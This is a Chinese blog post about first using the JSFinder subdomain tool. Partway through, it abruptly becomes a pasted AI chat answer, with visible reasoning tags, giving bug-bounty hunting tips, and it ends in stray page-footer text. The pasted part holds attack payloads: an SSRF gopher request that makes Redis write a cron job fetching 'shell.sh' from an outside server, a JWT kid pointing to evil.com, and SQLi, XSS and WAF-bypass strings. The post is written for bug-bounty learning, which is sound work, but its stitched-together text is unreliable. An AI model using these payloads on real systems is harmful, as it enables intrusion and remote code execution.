JSFinder的第一次使用

在github上下载了JSFinder,完成了第一次使用,中间遇到了一些曲折,希望写下来,供大家参考。

首先是下载,在github.com/Threezh1/JSFinder上下载

解压后得到两个文件

我们使用的是其中的python文件,所以我们要安装python环境,在官网下载相应版本即可。

安装好python后,在JSFinder.py目录下运行cmd,然后输入python JSFinder.py -u http网址,即可得到该网址在JavaScript中使用的子域名。以jd.com为例,如下。

新安装的python可能会报一些错,那是因为JSFinder.py用到的一些模块新安装的python里没有,在cmd中使用pip命令安装即可,例如缺少‘bs4’模块,会报错ModuleNotFoundError: No module named 'bs4',只需要在cmd中运行pip install bs4即可,安装时间不超过十秒。

<think>嗯,用户想了解SRC挖掘技巧,也就是安全响应中心漏洞挖掘的方法,而且需要深入一些,真正能帮助他们通过挖洞赚取赏金。首先,我得先确定用户的基础,可能他们已经了解一些基本概念,但需要更高级的技巧。然后,我要考虑哪些方面是SRC挖掘中的关键点,比如信息收集、漏洞类型的选择、工具使用、逻辑漏洞挖掘、绕过技巧、历史漏洞分析、权限提升、报告撰写等等。 用户可能已经知道常规的漏洞类型,比如SQL注入、XSS,但可能缺乏如何高效发现这些漏洞的策略。需要强调信息收集的重要性,因为全面的信息能增加攻击面。比如子域名枚举、目录扫描、JS文件分析、参数提取这些步骤,用户可能没有系统地应用过。 然后,漏洞类型方面,除了常见漏洞,可能需要介绍一些容易被忽视的漏洞,如SSRF、CSRF、业务逻辑漏洞,特别是业务逻辑漏洞在实战中往往更容易发现,但需要深入理解业务流程。比如支付漏洞中的金额篡改,用户可能没考虑到参数是否可以修改,或者是否有服务端校验。 工具链部分,用户可能使用过一些工具,但如何组合使用,或者使用更高效的工具,比如ParamSpider和x8工具进行参数提取,或者使用一些被动扫描工具如Arjun,这些可能是他们需要了解的。 逻辑漏洞的深入挖掘,比如并发竞争条件、条件竞争,用户可能没有测试过,或者不知道如何构造请求。比如批量请求绕过限频,或者时间差导致的漏洞。 绕过技巧方面,WAF的绕过是实际挖洞中常遇到的难题,用户可能需要具体的payload示例,比如SQL注入中如何绕过过滤,或者XSS中如何编码绕过。 历史漏洞的关联分析,用户可能没有意识到同一厂商不同子域或功能可能存在相同的问题,所以需要教他们如何利用之前的报告或CVE来寻找新模式。 权限提升和组合漏洞,比如信息泄露导致后续攻击,或者多个低危漏洞组合成高危,这也是提升漏洞价值的关键点。 报告撰写部分,用户可能知道漏洞的存在,但如何有效沟通,让厂商快速理解并确认漏洞,从而更快获得赏金,这也是需要注意的地方。 还要考虑用户可能的误区,比如只关注技术漏洞而忽视业务逻辑,或者测试时过于粗暴导致被封禁IP。需要提醒他们注意测试的合法性和范围,遵守SRC的规则。 最后,要确保内容结构清晰,分点列出,每个技巧都结合实际例子,让用户能够理解并应用。同时,强调耐心和积累的重要性,漏洞挖掘不是一蹴而就的,需要持续学习和实践。</think>好的,我将从实战角度深入介绍SRC(安全响应中心)漏洞挖掘的高阶技巧,这些方法在真实漏洞赏金猎人中广泛应用,结合技术细节和攻击面扩展思路,帮助提升漏洞发现效率。 --- ### **一、信息收集的降维打击** 1. **深度资产测绘** - 使用`chaos-zyter` + `Sublist3r`交叉验证子域名,结合证书透明度日志(如crt.sh)获取隐藏资产 - 通过`JSFinder`解析所有JavaScript文件,提取API端点、敏感路径(如/admin/config.json) - 利用`Waybackurls`获取历史URL存档,常发现已下线但未关闭的功能页面 2. **参数爆破的艺术** - 使用`ParamSpider`自动爬取参数后,通过`x8`工具集(x8、qsreplace)生成海量参数变异组合 - 重点关注`callback`、`redirect_uri`、`file`等高风险参数名,结合`ffuf`进行模糊测试 3. **源码泄露自动化** - 部署`git-all-secrets`扫描Github/Gitlab,设置关键词如: ```python "password" extension:env site:target.com ``` - 使用`DumpsterDiver`扫描备份文件(*.bak, *~),特别关注`/wp-content/uploads/`等CMS目录 --- ### **二、漏洞挖掘的精准打击点** #### **1. SSRF进阶利用链** - 探测云元数据API(AWS/Aliyun/腾讯云)时,尝试通过`X-Forwarded-For`头绕过IP限制 - 结合`gopher://`协议攻击Redis未授权访问,构造payload注入定时任务 ```http GET /proxy?url=gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$61%0d%0a%0a%0a%0a*/1 * * * * root curl http://your-server.com/shell.sh ``` #### **2. 业务逻辑漏洞深挖** - **支付漏洞**:篡改商品数量为负数,观察是否产生"余额增加"(如`quantity=-1`) - **验证码绕过**:连续发送10次相同请求,观察是否触发逻辑锁绕过 - **接口时序攻击**:在手机号修改流程中,并行请求新旧手机号的验证码接口 #### **3. JWT攻击矩阵** - 爆破弱密钥(常见密钥如`secret123`、`changeme`) - 注入`kid`参数指向可控服务器(如`kid=http://evil.com/key.pem`) --- ### **三、绕过技巧的黑暗艺术** #### **WAF绕过模板** ```sql /* SQLi绕过 */ id=1+union+/*%0a*/select+1,version()-- - /* XSS绕过 */ <svg/onload=alert`1`> <img src=x onerror="alert(1)"> /* SSTI绕过(Twig引擎) */ {{7*'7'}} → 若返回49则存在漏洞 ``` #### **云环境绕过** - 在`Host`头后追加随机子域名混淆检测: ```http Host: target.com.evil.com ``` --- ### **四、漏洞组合的致命连击** 1. **信息泄露 → RCE** - 通过`.git`泄露获取数据库配置 → 解密后登录phpMyAdmin → 执行SQL语句写入Webshell 2. **CSRF + 权限提升** - 诱使管理员点击恶意页面,通过CSRF修改其账号为超级管理员角色 3. **OAuth劫持链** - 利用开放重定向漏洞构造恶意回调地址 → 窃取OAuth授权码 → 接管第三方账号 --- ### **五、漏洞报告提权技巧** 1. **漏洞验证视频**:使用`asciinema`录制终端操作过程,比截图更具说服力 2. **风险量化模板**: ``` [Impact] 攻击者可利用此漏洞在30秒内接管任意用户账号 [Reproduction Steps] 1. 登录普通账号 2. 修改Cookie中userID=admin 3. 刷新页面获得管理员权限 [Suggested Fix] 增加服务端会话验证机制 ``` 3. **漏洞关联建议**:在报告末尾注明:"该漏洞可能影响同一架构下的xx子系统" --- ### **六、持续学习的核心资源** 1. **漏洞模式库**: - HackerOne公开报告库(https://hackerone.com/hacktivity) - CVE Details(https://www.cvedetails.com/)按产品分类检索 2. **自动化工具链**: - Nuclei自定义POC模板(https://nuclei.projectdiscovery.io/) - 自建被动扫描系统:Burp Suite + Logger++ + Elasticsearch --- **关键心法**: - 每天至少分析3个高质量漏洞报告,建立"漏洞模式识别"直觉 - 对每个参数保持"如果我是开发者,这里可能犯什么错误"的思维习惯 - 使用`Obsidian`建立个人漏洞知识库,记录每次测试的路径和Payload 通过这套方法论,配合持续实战,可显著提升漏洞挖掘成功率。注意始终遵守SRC测试规则,避免触碰法律红线。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值